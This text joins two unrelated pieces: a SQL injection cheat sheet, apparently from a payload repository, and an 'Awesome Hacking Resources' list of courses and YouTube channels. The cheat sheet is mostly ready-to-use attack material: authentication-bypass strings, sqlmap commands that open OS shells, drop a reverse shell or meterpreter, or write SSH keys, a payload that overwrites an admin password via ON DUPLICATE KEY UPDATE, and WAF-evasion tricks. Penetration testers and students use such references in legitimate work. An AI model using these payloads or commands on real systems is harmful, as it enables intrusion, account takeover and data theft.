* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
* [Using TOR with SQLmap](#using-tor-with-sqlmap)
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Routed injection](#routed-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
Detection of an SQL injection entry point
Simple characters
```sql
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
```
Multiple encoding
```sql
%%2727
%25%27
```
Merging characters
```sql
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
Weird characters
```sql
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
```
## DBMS Identification
```c
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
## SQL injection using SQLmap
### Basic arguments for SQLmap
```powershell
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```
### Load a request file and use mobile user-agent
```powershell
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
```
### Custom injection in UserAgent/Header/Referer/Cookie
```powershell
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
The injection is located at the '*'
```
### Second order injection
```powershell
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
### Shell
```powershell
SQL Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
```
### Crawl a website with SQLmap and auto-exploit
```powershell
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
### Using TOR with SQLmap
```powershell
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
```
### Using a proxy with SQLmap
```powershell
sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
```
### Using Chrome cookie and a Proxy
```powershell
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
```
### Using suffix to tamper the injection
```powershell
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
tamper=name_of_the_tamper
```
| Tamper | Description |
| --- | --- |
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|base64encode.py | Base64 all characters in a given payload |
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() |
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
|escapequotes.py | Slash escape quotes (' and ") |
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') |
|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart|
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart |
|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
|modsecurityversioned.py | Embraces complete query with versioned comment |
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
|percentage.py | Adds a percentage sign ('%') infront of each character |
|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart |
|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
|randomcase.py | Replaces each keyword character with random case value |
|randomcomments.py | Add random comments to SQL keywords|
|securesphere.py | Appends special crafted string |
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|space2comment.py | Replaces space character (' ') with comments |
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|varnish.py | Append a HTTP header 'X-originating-IP' |
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
## Authentication bypass
```sql
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5 SHA1)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6�]��!r,��b
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
/* MySQL only */
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
```
## Routed injection
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
```sql
Inject using payload:
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
## WAF Bypass
No Space (%20) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
No Whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
No Comma - bypass using OFFSET, FROM and JOIN
```sql
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
```
Blacklist using keywords - bypass using uppercase/lowercase
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
Blacklist using keywords case insensitive - bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```
Information_schema.tables Alternative
```sql
select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 |
| dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 |
...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
mysql> show tables in dvwa;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
```
Version Alternative
```sql
mysql> select @@innodb_version;
+------------------+
| @@innodb_version |
+------------------+
| 5.6.31 |
+------------------+
mysql> select @@version;
+-------------------------+
| @@version |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
mysql> mysql> select version();
+-------------------------+
| version() |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
```
## References
* Detect SQLi
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL:
* [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSSQL:
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
* [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
* [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
* [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
* [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
* [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* Second Order:
* [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
|
<h1 align="center">
<br>
<img width="200" src="https://github.com/sindresorhus/awesome/raw/main/media/logo.svg" alt="awesome">
<br>
</h1>
# Awesome Hacking Resources ![Awesome Hacking](https://img.shields.io/badge/awesome-hacking-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg)
A collection of hacking / penetration testing resources to make you better!
**Let's make it the biggest resource repository for our community.**
**You are welcome to fork and [contribute](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/contributing.md#contribution-guidelines).**
We started a new [tools](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/tools.md) list, come and contribute
## Table of Contents
* [Learning the Skills](#learning-the-skills)
* [YouTube Channels](#youtube-channels)
* [Companies](#Companies)
* [Conferences](#Conferences)
* [NEWS](#NEWS)
* [Sharpening Your Skills](#sharpening-your-skills)
* [Reverse Engineering, Buffer Overflow and Exploit Development](#reverse-engineering-buffer-overflow-and-exploit-development)
* [Privilege Escalation](#privilege-escalation)
* [Network Scanning / Reconnaissance](#network-scanning--reconnaissance)
* [Malware Analysis](#malware-analysis)
* [Vulnerable Web Application](#vulnerable-web-application)
* [Vulnerable OS](#vulnerable-os)
* [Exploits](#exploits)
* [Forums](#forums)
* [Archived Security Conference Videos](#archived-security-conference-videos)
* [Online Communities](#online-communities)
* [Online News Sources](#online-news-sources)
* [Linux Penetration Testing OS](#linux-penetration-testing-os)
### Learning the Skills
Name | Description
---- | ----
[CS 642: Intro to Computer Security](http://pages.cs.wisc.edu/~ace/cs642-spring-2016.html) | academic content, full semester course, includes assigned readings, homework and github refs for exploit examples. NO VIDEO LECTURES.
[CyberSec WTF](https://cybersecurity.wtf) | CyberSec WTF Web Hacking Challenges from Bounty write-ups
[Cybrary](https://www.cybrary.it/) | coursera style website, lots of user-contributed content, account required, content can be filtered by experience level
[Free Cyber Security Training](https://www.samsclass.info/) | Academic content, 8 full courses with videos from a quirky instructor sam, links to research, defcon materials and other recommended training/learning
[Hak5](https://www.hak5.org/) | podcast-style videos covering various topics, has a forum, "metasploit-minute" video series could be useful
[Hopper's Roppers Security Training](https://hoppersroppers.org/training.html) | Four free self-paced courses on Computing Fundamentals, Security, Capture the Flags, and a Practical Skills Bootcamp that help beginners build a strong base of foundational knowledge. Designed to prepare for students for whatever they need to learn next.
[Learning Exploitation with Offensive Computer Security 2.0](http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html) | blog-style instruction, includes: slides, videos, homework, discussion. No login required.
[Mind Maps](http://www.amanhardikar.com/mindmaps.html) | Information Security related Mind Maps
[MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/) | academic content, well organized, full-semester course, includes assigned readings, lectures, videos, required lab files.
[OffensiveComputerSecurity](https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html) | academic content, full semester course including 27 lecture videos with slides and assign readings
[OWASP top 10 web security risks](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) | free courseware, requires account
[SecurityTube](http://www.securitytube.net/) | tube-styled content, "megaprimer" videos covering various topics, no readable content on site.
[Seed Labs](http://www.cis.syr.edu/~wedu/seed/labs.html) | academic content, well organized, featuring lab videos, tasks, needed code files, and recommended readings
[TryHackMe](https://tryhackme.com/) | Designed prebuilt challenges which include virtual machines (VM) hosted in the cloud ready to be deployed
### YouTube Channels
Name | Description
---- | ----
[0patch by ACROS Security](https://www.youtube.com/channel/UCwlGrzF4on-bjiBhD8lO3QA) | few videos, very short, specific to 0patch
[BlackHat](https://www.youtube.com/channel/UCJ6q9Ie29ajGqKApbLqfBOg) | features talks from the BlackHat conferences around the world
[Christiaan008](https://www.youtube.com/channel/UCEPzS1rYsrkqzSLNp76nrcg) | hosts a variety of videos on various security topics, disorganized
| <td colspan="2" > **Companies** </td>
[Detectify](https://www.youtube.com/channel/UCm6N84sAaQ-BiNdCaaLT4qg) | very short videos, aimed at showing how to use Detictify scanner
[Hak5](https://www.youtube.com/user/Hak5Darren) | see Hak5 above
[Kaspersky Lab](https://www.youtube.com/channel/UCGhEv7BFBWdo0k4UXTm2eZg) | lots of Kaspersky promos, some hidden cybersecurity gems
[Metasploit](https://www.youtube.com/channel/UCx4d2aRIfxfEUdS_5YIYKPg) | collection of medium length metasploit demos, ~25minutes each, instructional
[ntop](https://www.youtube.com/channel/UCUYWuYlYKD5Yq5qBz0AIXJw/feed) | network monitoring, packet analysis, instructional
[nVisium](https://www.youtube.com/channel/UCTE8R-Otq_kVTo08eLsfeyg) | Some nVisum promos, a handful of instructional series on Rails vulns and web hacking
[OpenNSM](https://www.youtube.com/user/OpenNSM/feed) | network analysis, lots of TCPDUMP videos, instructional,
[OWASP](https://www.youtube.com/user/OWASPGLOBAL) | see OWASP above
[Rapid7](https://www.youtube.com/channel/UCnctXOUIeRFu1BR5O0W5e9w) | brief videos, promotional/instructional, ~ 5 minutes
[Securelist](https://www.youtube.com/user/Securelist/featured) | brief videos, interviews discussing various cyber security topics
[Segment Security](https://www.youtube.com/channel/UCMCI9TE3-PZ7CgKk7X6Qd_w/featured) | promo videos, non-instructional
[SocialEngineerOrg](https://www.youtube.com/channel/UCC1vbVVbYdNe-OZRldj-U6g) | podcast-style, instructional, lengthy content ~1 hr each
[Sonatype](https://www.youtube.com/user/sonatype/featured) | lots of random videos, a good cluster of DevOps related content, large range of lengths, disorganized
[SophosLabs](https://www.youtube.com/user/SophosLabs/featured) | lots of brief, news-style content, "7 Deadly IT Sins" segment is of note
[Sourcefire](https://www.youtube.com/user/SourcefireInc/featured) | lots of brief videos covering topics like botnets, DDoS ~5 minutes each
[Station X](https://www.youtube.com/channel/UC-vWmE-BHcUrYW5zwDijL1g) | handful of brief videos, disorganized, unscheduled content updates
[Synack](https://www.youtube.com/channel/UCRH0mvESjZ7eKY1LJZDPIbw/featured) | random, news-style videos, disorganized, non-instructional
[TippingPoint Zero Day Initiative](https://www.youtube.com/channel/UChbH7B5YhXANmlMYJRHpw0g) | very brief videos ~30 sec, somewhat instructional
[Tripwire, Inc.](https://www.youtube.com/user/TripwireInc/videos) | some tripwire demos, and random news-style videos, non-instructional
[Vincent Yiu](https://www.youtube.com/channel/UCFVI3_M1zqFzEok2sTeEP8w/featured) | handful of videos from a single hacker, instructional
| <td colspan="2"> **Conferences** </td>
[44contv](https://www.youtube.com/user/44contv) | in
[MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science) |Information security con based in London, lengthy instructional videos
[BruCON Security Conference](https://www.youtube.com/channel/UCqwMU1l90lf9BLersW6eAHw) | security and hacker conference based in b\Belgium, lots of lengthy instructinoal videos
[BSides Manchester](https://www.youtube.com/channel/UC1mLiimOTqZFK98VwM8Ke4w) | security and hacker con based in Mancheseter, lots of lengthy videos
[BSidesAugusta](https://www.youtube.com/channel/UC85CvsnrVlD_44eEgzb2OfA) | security con based in Augusta, Georgia, lots of lengthy instructional videos
[CarolinaCon](https://www.youtube.com/channel/UCTY3Dpz68CyrjwRzqkE4sFw) | security con based in North Carolina, associated with various 2600 chapters, lots of lengthy instructional content
[Cort Johnson](https://www.youtube.com/channel/UCV9r-yMeARWVCJEesim25Ag) | a handful of lengthy con-style talks from Hack Secure Opensec 2017
[DevSecCon](https://www.youtube.com/channel/UCgxhfP2Hi8MQYz6ZkwpLA0A) | lenghty con videos covering DevSecOps, making software more secure
[Garage4Hackers - Information Security](https://www.youtube.com/channel/UCDqagqREZlmJitWco-yPtvw/feed) | a handful of lengthy videos, About section lacks description
[HACKADAY](https://www.youtube.com/channel/UCnv0gfLQFNGPJ5MHSGuIAkw) | lots of random tech content, not strictly infosec, some instructional
[Hack In The Box Security Conference](https://www.youtube.com/channel/UC0BJVNTIEbG8CLG-xVVWJnA) | lengthy con-style instructional talks from an international security con
[Hack in Paris](https://www.youtube.com/channel/UC7xJU9_oqw-vS6OJExS-2iA) | security con based in paris, features lots of instructional talks, slides can be difficult to see.
[Hacklu](https://www.youtube.com/channel/UCI6B0zYvK-7FdM0Vgh3v3Tg/feed) | lots of lengthy con-style instructional videos
[Hacktivity](https://www.youtube.com/user/hacktivity/feed) | lots of lengthy con-style instructional videos from a con in central/eastern europe
[Hardwear.io](https://www.youtube.com/channel/UChwYb9xc9tZXquQxu4G0l_g/featured) | handful of lengthy con-style video, emphasis on hardware hacks
[IEEE Symposium on Security and Privacy](https://www.youtube.com/channel/UC6pXMS7qre9GZW7A7FVM90Q) | content from the symposium; IEEE is a professional association based in the us, they also publish various journals
[LASCON](https://www.youtube.com/channel/UCDHsOiMPS-SLppAOAJRD37Q) | lengthy con-style talks from an OWASP con held in Austin, TX
[leHACK](https://www.youtube.com/channel/UCSxk_CUfES4ly5Sspc0Vorw) | leHACK is the oldest ( 2003 ), leading, security conference in Paris, FR
[Marcus Niemietz](https://www.youtube.com/channel/UCtThfJl65L04ukWp0XZi3yg/videos) | lots of instructional content, associated with HACKPRA, an offensive security course from an institute in Germany
[Media.ccc.de](https://www.youtube.com/channel/UC2TXq_t06Hjdr2g_KdKpHQg) | The real official channel of the chaos computer club, operated by the CCC VOC - tons of lengthy con-style vids
[NorthSec](https://www.youtube.com/channel/UCqVhMzTdQK5VAosAGkMtpJw) | lengthy con-style talks from an applied security conference in Canada
[Pancake Nopcode](https://www.youtube.com/channel/UC3G6k7XfTgcWD2PJR8qJSkQ) | channel of Radare2 whiz Sergi "pancake" Alvarez, Reverse Engineering Content
